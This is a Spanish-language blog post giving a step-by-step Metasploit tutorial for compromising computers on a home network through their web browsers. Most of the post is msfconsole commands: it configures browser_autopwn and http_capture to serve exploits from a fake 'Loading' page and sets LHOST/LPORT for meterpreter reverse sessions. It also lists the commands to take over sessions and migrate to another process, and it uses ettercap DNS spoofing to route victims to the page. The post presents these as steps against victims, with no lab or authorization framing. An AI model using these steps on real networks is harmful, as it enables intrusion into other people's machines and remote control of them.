Explotando sistemas a través del navegador

¡Hola! En este post trataré de explicar cómo explotar diferentes sistemas a través de un navegador, simplemente apoyándome en metasploit y algún útil más.

Expongo el escenario, se trata de una red (doméstica por ejemplo) en la que hay un atacante utilizando Backtrack, lo que haremos será habilitar un ‘servidor web’ con un texto ‘Loading…’ que tendrá un frame apuntando al módulo browser_autopwn, el cual contiene exploits para los diferentes navegadores actuales.

Utilizaremos ettercap para hacer dns_spoofing y un módulo de metasploit llamado ‘browser_autopwn’.

Comenzemos, supongo de la base de que tenemos un pc (o máquina virtual) con Bakctrack instalado, bien, abrimos una consola y tecleamos:

sudo msfconsole

Al cabo de unos segundos veremos metasploit, bien, ahora ejecutamos las siguientes instrucciones:

use auxiliary/server/browser_autopwn

browser_autopwn

Ahora establecemos algunos parámetros necesarios:


setg AUTOPWN_HOST [ip_atacante]
setg AUTOPWN_PORT 55550 --> puerto de escucha
setg AUTOPWN_URI /ads --> URL, puede ser esta o simplemente /

set SRVPORT 55550
set URIPATH /ads

set LHOST [ip_atacante]
set LPORT 45000

run

Bien, como comprobaréis el módulo queda a la escucha en el puerto 55550, no en el 80, que será por el que normalmente, llegarán nuestras víctimas a través del protocolo http.

Ahora, con otro módulo de metasploit, lo que haremos será poner a escuchar en el puerto 80 a ‘http_capture’.


use auxiliary/server/capture/http
run

Bien, ahora si logramos dirigir a una víctima a http://%5Bip_atacante%5D, nos saldrá una pantalla con un mensaje de ‘Loading’ y en ella, un frame dirigiéndose al módulo autopwn anterior.

Loading...

Ok, ahora, cada vez que un cliente entre en la anterior dirección, en el módulo ‘browser_autopwn’ veremos aparecer lineas especificando el sistema operativo, el navegador.. etc.. del usuario. A continuación, este lanza un exploit al navegador y espera una sesión de meterpreter.

En mi caso, probé Win 8 con IE, y al entrar en la página me saltaba un complemento java queriendo ejecutarse…

Bien, si el cliente permite la ejecución del código maligno, tendremos una sesión, podremos ver las que tengamos con el comando ‘sessions -l’

Para elegir entre alguna de las que tengamos, escribimos ‘sessions -i [numero]’ y pluff, tendremos nuestra shell 😉

Aviso: Si por ejemplo conseguimos una shell a través de IE, es conveniente migrar a otro proceso del sistema, ya que si se cierra el navegador perderíamos el contacto :S, para ello:


getpid --> Nos dice el ID del proceso en el que nos encontramos
ps --> Nos muestra lista de procesos
migrate [pid] --> migramos a el pid del proceso elegido ;)

Bien, para dirigir el tráfico de la red hacia esta página fake, utilizaremos ettercap, explicado en este post ;).

NOTA: puede que el contenido de este post haya quedado obsoleto, se actualizará a la más brevedad posible 😉

Si teneis alguna duda, comentad 😉

HackSaludos!

Anuncios

Acerca de Darkvidhck

Estudiante de ingeniería informática, haciendo mis pinitos como desarrollador web, programador, gamer y Linuxero. Aficionado a la seguridad. Eterno viciado al conocimiento.
Esta entrada fue publicada en Seguridad y etiquetada , , , , . Guarda el enlace permanente.

2 respuestas a Explotando sistemas a través del navegador

  1. ChaosNet dijo:

    Hacking wireless 2.0 ed: Anaya…
    No obstante convendría actualizar el post ya que gracias a las actualizaciones de MSF se ha quedado obsoleto (por ejemplo el módulo browser autopwn ya no usa solo un puerto de escucha…)
    Buen aporte para quienes no conocían esta faceta de metasploit.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s